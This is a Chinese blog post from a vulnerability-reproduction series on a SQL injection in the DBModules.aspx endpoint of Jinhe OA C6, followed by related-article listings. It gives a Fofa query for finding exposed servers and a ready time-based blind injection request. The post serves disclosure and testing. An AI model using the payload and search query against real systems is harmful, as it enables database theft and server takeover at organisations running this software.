金和OA-C6协同管理平台sql注入

iSee857

已于 2024-08-27 17:19:39 修改

阅读量344

点赞数 10

分类专栏：漏洞复现文章标签： web安全

于 2024-08-23 17:10:23 首次发布

本文链接：https://blog.csdn.net/xc_214/article/details/141470391

版权

漏洞复现专栏收录该内容

119 篇文章 10 订阅

订阅专栏

0x01 漏洞描述：

金和OA C6 DBModules.aspx接囗处存在SQL注入漏洞，攻击者除了可以利用 SQL注入漏洞获取数据库中的信息(例如，管理员后台密码、站点的用户个人信息)之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限

0x02 搜索语句：

Fofa：body="c6/Jhsoft.Web.login"

0x03 漏洞复现：

GET /C6/JHSoft.Web.WorkFlat/DBModules.aspx/?interfaceID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

0x04 修复建议：

关闭互联网暴露面或接口设置访问权限

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

iSee857

关注关注

10
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

金和OA C6任意文件读取漏洞复现[附POC]

薛定谔嘚喵博客

10-11

1134

金和OA C6系统的download.jsp文件存在任意文件读取漏洞，攻击者通过漏洞可以获取服务器的敏感信息。

金和OA C6 DBModules.aspx SQL注入漏洞复现

0xSec

08-23

502

金和OA C6 DBModules.aspx 接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

参与评论您还未登录，请先登录后发表或查看评论

【漏洞复现】金和OA C6 UserList 存在SQL注入漏洞

https://blog.echo234.cn/

03-29

342

金和OA协同办公管理系统C6软件共有20多个应用模块，160多个应用子模块，涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围，从功能型的协同办公平台上升到管理型协同管理平台，并不断的更新完善，全面支撑企业发展。金和OA C6 UserList存在SQL注入漏洞。

金和OA 某接口存在SQL漏洞-未公开0Day漏洞复现

weixin_43167326的博客

01-29

511

金和OA是一款企业办公管理软件，它可以帮助企业实现流程管理、审批流程、文件管理、通知公告等功能。金和OA的核心理念是“简单、直接、有效”，通过提供简单易用的界面和高效的功能，帮助企业提高工作效率，降低管理成本。SQL注入可以导致攻击者执行任意的SQL代码，从而获取、修改或删除数据库中的数据。这不仅会导致数据泄露和其他安全风险，还可能对组织的运营和声誉造成严重影响。

漏洞复现--金和OA clobfield SQL注入

qq_53003652的博客

12-19

777

金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。该产品存在SQL注入漏洞。

金和OA政府版解决方案

06-22

金和OA政府版解决方案金和OA政府版解决方案金和OA政府版解决方案金和OA政府版解决方案金和OA政府版解决方案金和OA政府版解决方案金和OA政府版解决方案

【漏洞复现】金和OA-C6-SQL注入-MailTemplates

知黑而守白

04-08

130

金和OA协同办公管理系统软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 MailTemplates 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

【漏洞复现】金和OA-C6-GetHomeInfo-sql注入

知黑而守白

01-16

金和OA协同办公管理系统软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 HomeService 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

【漏洞复现】金和OA-C6-incentiveplanfulfill-sql注入

知黑而守白

03-20

149

金和OA协同办公管理系统软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。金和OA协同办公管理系统 incentiveplanfulfill 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果。

金和OA C6 jQueryUploadify.ashx SQL注入漏洞复现

0xSec

08-31

530

金和OA C6 jQueryUploadify.ashx 接口处存在SQL注入漏洞，攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

金和OA jc6 viewConTemplate.action RCE漏洞复现

0xSec

03-13

554

金和OA jc6 portalwb-con-template!viewConTemplate.action接口存在FreeMarker模板注入漏洞，未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件，导致服务器存在被控的风险。

漏洞复现-金和OA系列

aming小老弟

03-14

1142

|| banner=“Path=/jc6”金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。app=“金和网络-金和OA”||body=“/jc6/platform/sys/login”请联系厂家 http://www.jinher.com/升级。

分享99个ASP办公 OA源码，总有一款适合您

zdh13370188237的博客

04-08

839

分享99个ASP办公 OA源码，总有一款适合您

金和OA C6 UploadFileEditorSave.aspx 文件上传漏洞复现

0xSec

01-03

1155

金和OA C6系统UploadFileEditorSave.aspx接口处存在任意文件上传漏洞，未经身份认证的攻击者可利用此漏洞上传恶意后门文件，最终可导致服务器失陷。

【漏洞复现】金和OA 未授权访问

2301_80127209的博客

06-28

315

金和OA协同办公管理系统C6软件（简称金和OA），本着简单、适用、高效的原则，贴合企事业单位的实际需求，实行通用化、标准化、智能化、人性化的产品设计，充分体现企事业单位规范管理、提高办公效率的核心思想，为用户提供一整套标准的办公自动化解决方案，以帮助企事业单位迅速建立便捷规范的办公环境。金和OA sap-b1config-aspx接口存在未授权，攻击者可通过此漏洞获取敏感信息。

网络安全详解

weidl001的博客

09-21

1556

网络安全（Cybersecurity）是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性（Confidentiality）：确保信息仅被授权的人员访问。完整性（Integrity）：保护信息不被未授权的修改或破坏。可用性（Availability）：确保信息和资源在需要时可被访问和使用。

国产操作系统（统信UOS）网络安全等级保护基础安全加固